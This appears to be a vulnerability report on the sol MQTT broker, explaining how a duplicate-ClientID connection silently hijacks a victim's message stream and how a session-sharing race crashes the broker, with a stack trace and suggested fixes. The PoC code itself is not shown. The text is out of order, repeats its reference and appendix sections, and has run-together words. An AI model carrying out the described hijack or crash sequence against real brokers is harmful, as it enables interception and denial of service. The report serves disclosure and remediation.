- MQTT v3.1.1 specification, §3.1.4, normative statement [MQTT-3.1.4-2]: "If the ClientID represents a Client already connected to the Server then the Server MUST disconnect the existing Client." (OASIS MQTT Version 3.1.1.)
- MQTT v5.0 specification, §3.1.4 / normative table, statement [MQTT-3.1.4-3]: "...the Server sends a DISCONNECT packet to the existing Client with Reason Code of 0x8E (Session taken over) ... and MUST close the Network Connection of the existing Client." (local copy: RFC/MQTT-v5.0.txt, lines 4760-4765 and 12316-12324; reason-code definition at line 9211.)
- sol source (version 0.18.5), root src/:
  - handlers.c:390-393: dead "kick out" comment.
  - handlers.c:400-405: session lookup / HASH_DEL / session_present.
  - handlers.c:416: session-reuse branch (skips allocation).
  - handlers.c:425: unconditional duplicate-key HASH_ADD_STR.
  - handlers.c:167: HASH_FIND_STR first-match routing in publish_message.
  - handlers.c:152, 189, 202-204, 216-218: publish side guarded by global mutex.
  - handlers.c:791-794, 803-820, 839-855: ack handlers locking only c->mutex while mutating the shared session (note pubrec's i_acks write at 817 sits outside its lock).
  - handlers.c:309-311: set_connack writes Session-Present at bit 0.
  - sol_internal.h:225-244: struct client_session with no mutex; sol_internal.h:208: struct client carries the mutex.
  - server.c:308-352, 937: inflight-retry cron, 20 s threshold, 1 s cadence, HASH_ITER over clients_map.
  - server.c:319, 324: cron HASH_ITER + per-client c->mutex.
  - server.c:381-404: client_init (sets online=true at 383, inits c->mutex at 403).
  - server.c:412-446: client_deactivate (clears online at 425, HASH_DEL(clients_map) at 441).
  - server.h:39: THREADSNR = 2 default.
  - ref.h:50-52: ref_dec (the crash site).
  - uthash.h:846-866 (HASH_FIND_IN_BKT, first match), 869-884 (HASH_ADD_TO_BKT, prepend), 951-973 (HASH_EXPAND_BUCKETS, order reversal).
  - sol.c:62, README.md:8: MQTT 3.1.1 self-identification; CMakeLists.txt:4: VERSION 0.18.5.
  - config.c:368, 246-251: allow_anonymous=true default.
- PoCs: PLVerifier/buchi_verify_workspace/sol/MQTT_004/poc/{mqtt004_hijack.py, mqtt004_cron_race.py, mqtt004_race.py, poc_report.md}.
Appendix A — ASan/UBSan stack trace (verbatim)
Reproduced by running sol_asan (-DDEBUG=ON, ASan+UBSan) on 127.0.0.1:1884 and executing mqtt004_cron_race.py. UBSan fires first, then ASan:
handlers.c:793:5: runtime error: member access within null pointer of type 'struct mqtt_packet'
ERROR: AddressSanitizer: SEGV on unknown address 0x000000000080 (WRITE)
The signal is caused by a WRITE to memory with address #0x000000000080 with insufficient permissions.
#0 0x... in ref_dec src/ref.h:52
#1 0x... in puback_handler src/handlers.c:793 <- inflight_msg_clear(&c->session->i_msgs[pkt_id])
#2 0x... in handle_command src/handlers.c:879
#3 0x... in process_message src/server.c:867
#4 0x... in read_callback src/server.c:794
#5 0x... in ev_process_event src/ev.c:656
#6 0x... in ev_run src/ev.c:761
#7 0x... in eventloop_start src/server.c:940
#8 0x... in start_server src/server.c:1019
#9 0x... in main src/sol.c:128
SUMMARY: AddressSanitizer: SEGV src/ref.h:52 in ref_dec
==ABORTING==
Root-cause characterisation of the 0x80 address: the accessed pointer is NULL (an i_msgs[pkt_id] slot that was cleared by a prior puback_handler run at handlers.c:794, c->session->i_msgs[pkt_id].packet = NULL), and a concurrent/duplicate puback re-enters inflight_msg_clear and calls ref_dec on that NULL packet. In the debug build, &((struct mqtt_packet *)0)->refcount == 0x78; struct ref { void (*free)(...); volatile atomic_int count; }, so count lives at 0x78 + 8 == 0x80. ref_dec line 52 decrements count, i.e. writes packet + 0x80; with packet == NULL that write lands at address 0x80 in the zero page → SEGV. The precise classification is therefore a concurrent double-clear of a shared inflight slot that DECREFs a NULL packet pointer, leading to a near-null-page write; "use-after-free" is acceptable shorthand, but the exact root cause is the unprotected shared-session NULL slot, which is why ASan reports a SEGV/DEADLYSIGNAL rather than a heap-use-after-free report.
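The address arithmetic above can be checked directly. The snippet is a small sketch that takes the two figures stated in the text as inputs (refcount at offset 0x78, and an 8-byte function pointer preceding count, which assumes a 64-bit build); `faulting_address` and its parameter names are hypothetical.

```python
def faulting_address(packet_ptr: int, refcount_offset: int = 0x78,
                     fn_ptr_size: int = 8) -> int:
    """Address written when decrementing packet->refcount.count."""
    # count sits after the free() function pointer inside struct ref.
    return packet_ptr + refcount_offset + fn_ptr_size


print(hex(faulting_address(0)))
```

With a NULL packet pointer the write lands at 0x80, the same address reported in the ASan trace.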
clean_session=false, the second CONNECT also reuses the victim'sstruct client_sessionby pointer with no session-level lock. The inflight-retry cron (inflight_msg_check, registered every 1 s, re-sending anything held > 20 s) iterates all clients including both colliding entries and operates concurrently on the shared session'si_msgs[]/ refcounts across the two worker threads. A PUBACK clearing an inflight slot on one connection can race against a duplicate/cron-driven clear on the other, producing aref_decon aNULLpacket pointer and a SEGV that aborts the whole broker.Root cause analysis
1. The "kick out" comment is dead code; no existing connection is ever closed.
connect_handlercarries an aspirational comment but performs no eviction:The code below it looks up only the session table and never the live-connection table:
server.sessionsis the session store; the live connections live inserver.clients_map. There is noHASH_FIND_STRonserver.clients_mapanywhere inconnect_handler— the only such lookup in the file is inpublish_message(handlers.c:167). There is noclient_deactivate()call and no DISCONNECT send on the colliding path. Theclient_deactivate()call sites are exclusively on a client's own read-error/disconnect teardown (server.c:709/833/884), and the onlyHASH_DEL(server.clients_map, ...)lives insideclient_deactivate(server.c:441), never on connect. So the pre-existing connection stays authenticated and online (itsonlineflag, set atclient_init/accept inserver.c:383, is cleared only in its ownclient_deactivateatserver.c:425).The session-HASH_DEL at line 403 and the
session_present=1at line 405 touch only the session table, never the live socket.2. Duplicate ClientID keys coexist in
clients_map.This call is guarded only by the global
mutex(taken athandlers.c:397), not by any duplicate-key check. sol's bundled uthash does not deduplicate:HASH_ADD_TO_BKT(src/uthash.h:869-884) merely prependsaddhhto the bucket'shh_headlist with no key-equality check, andHASH_ADD_TO_TABLE(uthash.h:376-385) likewise enforces no uniqueness. Twostruct cliententries with identicalclient_idtherefore coexist.3. The colliding CONNECT reuses the victim's session by pointer.
On the
clean_session=falsecollision path, the session-reuse branch is taken and allocation is skipped:Since
cc->sessionwas already populated by theHASH_FIND_STRat line 400, the new client'scc->sessionends up pointing to the samestruct client_sessionthe already-connected victim is using. Three references to one struct now coexist: theserver.sessionsuthash entry, the victim'sc->session, and the attacker'scc->session. No deep copy occurs.session_present=1(handlers.c:405) is later passed toset_connack(handlers.c:471) as the CONNACK Session-Present flag (set_connackwrites0 | (sp & 0x1) << 0,handlers.c:311) — observed asSP=1in the PoC.4. Routing uses first-match bucket lookup → newest connection wins.
HASH_FIND_STR→HASH_FIND→HASH_FIND_BYHASHVALUE→HASH_FIND_IN_BKT(src/uthash.h:846-866) walks the bucket chain fromhh_headand breaks on the first key match (uthash.h:853-857). BecauseHASH_ADD_TO_BKTprepends (uthash.h:873-878),hh_headis the most-recently-added entry. Both connections hash to the same bucket (identical key string), so the lookup returns the attacker (B, added second). This is why subsequent PUBLISHes for that ClientID are delivered to the attacker and not to the victim.(Clarifying "head": here "head" means the bucket's
hh_head, set by prepend = most-recently-added — not the global uthash list head, whichHASH_APPEND_LISTappends to. The publish-routing path uses the bucket chain, so "most-recently-added" is the right description.)5. No session-level lock; the shared session is mutated concurrently.
struct client_session(sol_internal.h:225-244) has nopthread_mutex_tmember — onlyUT_hash_handle hhandstruct ref refcount. The per-client lock lives onstruct client(sol_internal.h:208), not the session. The ack handlers that DECREF inflight packets lock only the calling client's mutex:pubcomp_handler(handlers.c:839-855, DECREF at line 848) follows the same single-c->mutexpattern. Becausec1->session == c2->sessionbutc1->mutex != c2->mutex, two threads can mutate the samei_msgs[]/i_acks[]/inflights/next_free_midwith no lock in common.Precision on locking asymmetry (important): the publish side of these mutations is guarded —
publish_messagetakes the globalmutex(handlers.c:152), which coversnext_free_mid()(line 189) and the inflight writes (lines 202-204 offline / 216-218 online). The ack side (puback/pubcomp) takes onlyc->mutex, not the globalmutex. (Note:pubrec_handlerathandlers.c:803-820does takec->mutexat line 809, but its only shared-session write —c->session->i_acks[pkt_id] = time(NULL)at line 817 — sits outside that lock; it does not mutatei_msgs[]and does not DECREF, so it is the weakest example of the pattern.) The hazard is the missing lock shared betweenc1->mutexandc2->mutex, combined with the ack side bypassing the global lock that protects the publish side. That asymmetry, plus the absence of any session-level lock, is the real root cause.6. The inflight-retry cron is the path that hits both colliding connections.
The cron is registered to fire every 1 second:
Critically,
inflight_msg_checkiterates clients withHASH_ITER(server.c:319), which visits every entry — including both colliding entries with the duplicate ClientID. The publish-routing path, by contrast, usesHASH_FIND_STR(first-match only) and thus funnels traffic to a single connection. This routing-vs-cron iteration difference is precisely why the 20 s-retry cron path — and only it — concurrently replays the sharedi_msgs[], creating the double-ref_dec/ NULL-packet window that crashes the broker. This also explains why naive high-throughput stress (routing-funnelled) does not crash, while the deliberate unacked-inflight + takeover sequence does.Specification context
sol is an MQTT 3.1.1 broker. The binding obligation it violates is the OASIS MQTT 3.1.1 requirement, numbered [MQTT-3.1.4-2] in the 3.1.1 spec (note: in the 3.1.1 numbering scheme — the collision rule's ID differs in v5.0; see the correction below):
sol does not comply: on a duplicate ClientID it neither sends a DISCONNECT to nor closes the pre-existing live connection.
For informational context, MQTT v5.0 strengthens the same obligation (and assigns it a different normative ID, [MQTT-3.1.4-3], not [MQTT-3.1.4-2]). From the v5.0 spec text:
Numbering correction (please cite carefully): the two specs use different IDs for the collision rule. In MQTT 3.1.1 it is [MQTT-3.1.4-2]; in MQTT v5.0 the collision/takeover rule is [MQTT-3.1.4-3] — v5.0's [MQTT-3.1.4-2] is a different statement about authentication/authorization checks (
MQTT-v5.0.txt:4749/ 12308-12314). Because sol is a 3.1.1 broker, the binding requirement it fails is the 3.1.1 [MQTT-3.1.4-2] "MUST disconnect the existing Client". The v5.0 [MQTT-3.1.4-3] 0x8E-DISCONNECT requirement is informational context showing how the obligation is strengthened in the newer spec; it is not a normative bar that a 3.1.1-only implementation is held to (sol already fails the lower 3.1.1 bar by leaving the old connection live).Impact
Confidentiality (High). The victim's entire subsequent subscribed-topic message stream is silently diverted to the attacker. The PoC shows that after the attacker's collision CONNECT, the victim receives nothing (
CLAIM3: A msgs=[]) while the attacker receives every PUBLISH (CLAIM2: B msgs=[b'hijacked-2']). For IoT deployments where ClientIDs are frequently fixed/guessable device identifiers, this is a full-stream disclosure.Integrity (High). The attacker becomes a silent MITM on the victim's stream — able to swallow, forge, or replay commands destined for IoT devices. Separately, the shared-session race corrupts the victim's
next_free_mid/i_msgs[]/i_acks[]/inflightsstate, so even non-intercepted traffic is at risk of misdelivery or silent loss.Availability (High). The concurrent double-clear of a shared inflight slot drives
ref_decon aNULLpacket pointer (SEGV on unknown address 0x80 (WRITE, zero page)inref_decatref.h:52, reached viapuback_handlerathandlers.c:793). This is a structural null/UAF dereference that will SIGSEGV a release build as well — it is not an ASan-only artifact; ASan merely makes reproduction reliable. Because sol is a single process with no SIGSEGV handler, the crash takes the broker down for every connected client.Stealth. Because sol never sends a DISCONNECT (let alone a v5.0 0x8E "Session taken over") to the displaced client, the victim's connection shows no sign of having been taken over — its keepalive PINGREQ/PINGRESP still round-trips (PoC
CLAIM1). Detection by the victim requires correlating a silent drop in message delivery with a takeover event, which is impractical in normal telemetry.Exploitability framing. The hijack is low-complexity and reliable at normal connection counts. The crash is timing-gated but the window is fully attacker-controlled (the attacker chooses PUBACK cadence and the takeover instant), so it does not rise to AC:H; note that bare high-throughput stress (~1.1M messages) does not crash because routing funnels traffic to a single connection and starves the concurrent-ack condition — the reliable trigger is the deliberate unacked-inflight + takeover sequence shown in the crash PoC.
Proof of Concept
All PoCs are bare MQTT 3.1.1 over plain TCP; no third-party Python dependencies. They target
127.0.0.1:1884againstsol_bin(hijack) orsol_asan(crash). Files live in-tree atpoc/.Build & run
PoC 1 — silent subscription/message hijack (
mqtt004_hijack.py)Minimal reproducer (self-contained; verbatim from the verified file):
Observed output (two independent clean runs, identical):
PoC 2 — remote crash via shared-session refcount race (
mqtt004_cron_race.py)Scenario: A (
clean=false) subscribes at QoS1; the publisher P sends 39 QoS1 PUBLISHes that A does not ack (they stay inflight in the shared session'si_msgs); wait 22 s so sol's 20 s inflight-retry cron (server.c:329-330) is armed; then attacker B connects with the same ClientID (session reuse). The cron'sHASH_ITERnow visits both A and B (duplicate keys) and concurrently operates on the samei_msgs[]/refcounts across the two worker threads (THREADSNR=2). B's PUBACK of a dup retry racing with A's cron retry on the same slot drivesref_decon aNULLpacket pointer → SEGV.Minimal harness (verbatim from the verified file; it imports codec helpers from
mqtt004_race.py):Suggested remediation
These are suggestions, not demands. The minimal, spec-aligned fix is the first item; the rest harden the shared-session invariant.
Disconnect the existing client on ClientID collision (binding 3.1.1 [MQTT-3.1.4-2]). In
connect_handler, beforeHASH_ADD_STR(server.clients_map, client_id, cc)athandlers.c:425, perform aHASH_FIND_STR(server.clients_map, cc->client_id, existing); if found andexisting != cc, send it a DISCONNECT (MQTT v5.0: Reason Code 0x8E "Session taken over", per [MQTT-3.1.4-3]; MQTT 3.1.1: a bare DISCONNECT) and tear it down via the existingclient_deactivate()path before adding the new client. This makes the long-standing "kick him out" comment athandlers.c:390-393finally true and removes the duplicate-key ambiguity entirely.Do not let two live connections share one
struct client_sessionwithout synchronisation. Either (a) disallow session reuse while a connection for that ClientID is still online (fail the second CONNECT or take it over atomically as above), or (b) givestruct client_sessionits ownpthread_mutex_tand require it for every mutation ofi_msgs[]/i_acks[]/inflights/next_free_mid, including the publish path, the ack handlers (puback/pubrec/pubcomp), and theinflight_msg_checkcron. Today the publish side holds only the globalmutexwhile the ack side holds onlyc->mutex— there is no lock shared between the two colliding clients, which is the precise root cause of the crash.Close the locking asymmetry explicitly. If a session-level lock is added, ensure the inflight-retry cron (
server.c:308-352, whichHASH_ITERs and so touches both colliding entries) and the ack handlers take it; today the cron's per-clientc->mutexlock (server.c:324) does not serialise access to the shared session because the two colliding clients hold differentc->mutexinstances. Also movepubrec_handler'sc->session->i_acks[pkt_id] = time(NULL)(handlers.c:817) inside itsc->mutexcritical section, or under the new session lock, so it stops being a data race.Consider replacing the unguarded
HASH_ADD_STRsemantics. Even after fix 1, an explicit "already-present" check before insertion is safer than relying on uthash's duplicate-key tolerance; it makes the routing table's single-winner invariant a code-level guarantee rather than a uthash-implementation detail (and pre-empts any future expansion-induced ordering surprise, whereHASH_EXPAND_BUCKETScan reverse intra-bucket order and flip the winner).References
RFC/MQTT-v5.0.txt, lines 4760-4765 and 12316-12324; reason-code definition at line 9211.)src/:handlers.c:390-393— dead "kick out" comment.handlers.c:400-405— session lookup / HASH_DEL / session_present.handlers.c:416— session-reuse branch (skips allocation).handlers.c:425— unconditional duplicate-keyHASH_ADD_STR.handlers.c:167—HASH_FIND_STRfirst-match routing inpublish_message.handlers.c:152, 189, 202-204, 216-218— publish side guarded by globalmutex.handlers.c:791-794, 803-820, 839-855— ack handlers locking onlyc->mutexwhile mutating the shared session (notepubrec'si_ackswrite at 817 sits outside its lock).handlers.c:309-311—set_connackwrites Session-Present at bit 0.sol_internal.h:225-244—struct client_sessionwith no mutex;sol_internal.h:208—struct clientcarries the mutex.server.c:308-352, 937— inflight-retry cron, 20 s threshold, 1 s cadence,HASH_ITERoverclients_map.server.c:319, 324— cronHASH_ITER+ per-clientc->mutex.server.c:381-404—client_init(setsonline=trueat 383, initsc->mutexat 403).server.c:412-446—client_deactivate(clearsonlineat 425,HASH_DEL(clients_map)at 441).server.h:39—THREADSNR = 2default.ref.h:50-52—ref_dec(the crash site).uthash.h:846-866(HASH_FIND_IN_BKT, first match),869-884(HASH_ADD_TO_BKT, prepend),951-973(HASH_EXPAND_BUCKETS, order reversal).sol.c:62,README.md:8— MQTT 3.1.1 self-identification;CMakeLists.txt:4—VERSION 0.18.5.config.c:368, 246-251—allow_anonymous=truedefault.PLVerifier/buchi_verify_workspace/sol/MQTT_004/poc/{mqtt004_hijack.py, mqtt004_cron_race.py, mqtt004_race.py, poc_report.md}.Appendix A — ASan/UBSan stack trace (verbatim)
Reproduced by running
sol_asan(-DDEBUG=ON, ASan+UBSan) on127.0.0.1:1884and executingmqtt004_cron_race.py. UBSan fires first, then ASan:Root-cause characterisation of the
0x80address: the accessed pointer isNULL(ani_msgs[pkt_id]slot that was cleared by a priorpuback_handlerrun athandlers.c:794,c->session->i_msgs[pkt_id].packet = NULL), and a concurrent/duplicate puback re-entersinflight_msg_clearand callsref_decon that NULL packet. In the debug build,&((struct mqtt_packet *)0)->refcount == 0x78;struct ref { void (*free)(...); volatile atomic_int count; }, socountlives at0x78 + 8 == 0x80.ref_decline 52 decrementscount, i.e. writespacket + 0x80; withpacket == NULLthat write lands at address0x80in the zero page → SEGV. The precise classification is therefore a concurrent double-clear of a shared inflight slot that DECREFs a NULL packet pointer, leading to a near-null-page write; "use-after-free" is acceptable shorthand, but the exact root cause is the unprotected shared-session NULL slot, which is why ASan reports a SEGV/DEADLYSIGNAL rather than a heap-use-after-free report.